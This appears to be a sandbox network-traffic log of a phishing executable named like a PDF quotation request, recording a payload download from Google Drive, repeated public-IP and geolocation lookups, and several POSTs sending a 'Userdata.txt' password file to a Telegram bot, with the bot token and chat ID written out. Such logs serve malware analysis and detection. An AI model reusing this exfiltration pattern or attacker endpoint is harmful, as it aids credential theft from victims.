Dec 16, 2024 08:44:41.683551073 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
Dec 16, 2024 08:44:42.057377100 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: e1d57d8629cb8f98de470a1981d64662
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 08:44:49.734045029 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
Dec 16, 2024 08:44:50.107709885 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:49 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: b5edfc16cdb354535026832a55efa609
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49844 | 158.101.44.242 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:44:52.934993982 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
Dec 16, 2024 08:44:54.144963980 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:53 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: b99684083ec15b3027b2831a2f8a3ce2
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49852 | 158.101.44.242 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:44:56.300303936 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
Dec 16, 2024 08:44:57.522845984 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:57 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 4b99d3dcf74a5f93bb19a25011382008
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49862 | 158.101.44.242 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:44:59.758994102 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:02.519011021 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:02 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: afc6f44e34e76ab6fcddabd014737090
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49875 | 158.101.44.242 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:45:04.671096087 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:16.278702021 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:16 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2fbdba07851b3206b7871b2058fc6dca
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49908 | 158.101.44.242 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:45:18.484213114 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:19.688147068 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:19 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9d2a2e7e16961cd1921e18bec2de835c
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49919 | 158.101.44.242 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:45:21.966839075 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:23.179970026 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:22 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6303f18940a11b9e078f1679cae07bc4
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49930 | 193.122.130.0 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:45:25.598035097 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:26.695615053 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 848dbb888a1ab68f2e2f49bd214d5708
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49938 | 193.122.130.0 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:45:28.832575083 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:29.936479092 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:29 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: af39b14e06f2a5c22cfa31a22ac70203
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49949 | 193.122.130.0 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:45:32.122556925 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:34.158066988 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:33 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 783135d0138481a3fb0d48aa4811438d
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49961 | 193.122.130.0 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:45:36.511266947 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:37.608104944 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6950c46c84bd45c591ef667dd99f54e9
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49969 | 193.122.130.0 | 80 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:45:39.832798004 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 08:45:41.929605007 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:45:41 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2e9b72037118b75469fa8eb581f0b169
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549790172.217.19.174443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:44:33 UTC216OUTGET /uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                Host: drive.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-16 07:44:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:34 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'nonce-pXvxGHE40Yaj-6V0GYm3Pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49802 | 142.250.181.1 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 07:44:36 UTC | 258 | OUT | GET /download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
2024-12-16 07:44:39 UTC | 4939 | IN | HTTP/1.1 200 OK
                                                                                                                                X-GUploader-UploadID: AFiumC6HLVupzY8K2uf9YWDcdIczHASiTlS6vHhlpMOskO7G6jh_KJfPkhEXKS6R-mAI3KwZ
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Security-Policy: sandbox
                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Content-Disposition: attachment; filename="fmmFdTckrikVXlvt156.bin"
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 94272
                                                                                                                                Last-Modified: Mon, 16 Dec 2024 03:29:51 GMT
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:38 GMT
                                                                                                                                Expires: Mon, 16 Dec 2024 07:44:38 GMT
                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                X-Goog-Hash: crc32c=+J2ItA==
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49817 | 104.21.67.152 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 07:44:43 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
2024-12-16 07:44:44 UTC | 878 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:43 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 323852
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGuAZBiTgYYJ%2BcuVp1qtnbdPeTDApZinkL4MyIoUkcXd4Ui8zIIUeqctEE3EneMGSerNh7zEcfDt41yN2%2Baf5PLOI9JnPYE%2BM3SeNfVs9bI1zq3r2NRbYpfz4rg2H5A2F77%2Bnpf1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f2d0cc27ef11a3c-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1777&rtt_var=680&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1594756&cwnd=229&unsent_bytes=0&cid=52bde3f29f2c3e7f&ts=454&x=0"
2024-12-16 07:44:44 UTC | 362 | IN | Data:
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49837 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 07:44:52 UTC | 296 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1d7b9c0b8eeb
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
2024-12-16 07:44:52 UTC | 1090 | OUT | Data:
                                                                                                                                Data Ascii: --===============8dd1d7b9c0b8eebContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-16 07:44:52 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:52 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:44:52 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":12250,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335092,"document":{"file_n


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                4 | 192.168.2.5 | 49846 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-16 07:44:55 UTC | 296 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1dadbdd2d442
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:44:55 UTC | 1090 | OUT | Data Ascii: --===============8dd1dadbdd2d442Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:44:56 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:55 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:44:56 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":12251,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335095,"document":{"file_n


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                5 | 192.168.2.5 | 49857 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-16 07:44:58 UTC | 272 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1dd8a5601335
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-16 07:44:58 UTC | 1090 | OUT | Data Ascii: --===============8dd1dd8a5601335Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:44:59 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:59 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:44:59 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":12252,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335099,"document":{"file_n


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                6 | 192.168.2.5 | 49869 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-16 07:45:03 UTC | 296 | OUT | POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1e17dc155d45
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:45:03 UTC | 1090 | OUT | Data Ascii: --===============8dd1e17dc155d45Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:04 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:04 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:04 UTC | 543 | IN | Data Ascii: {"ok":true,"result":{"message_id":12253,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335104,"document":{"file_n


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                7 | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | 616 | C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
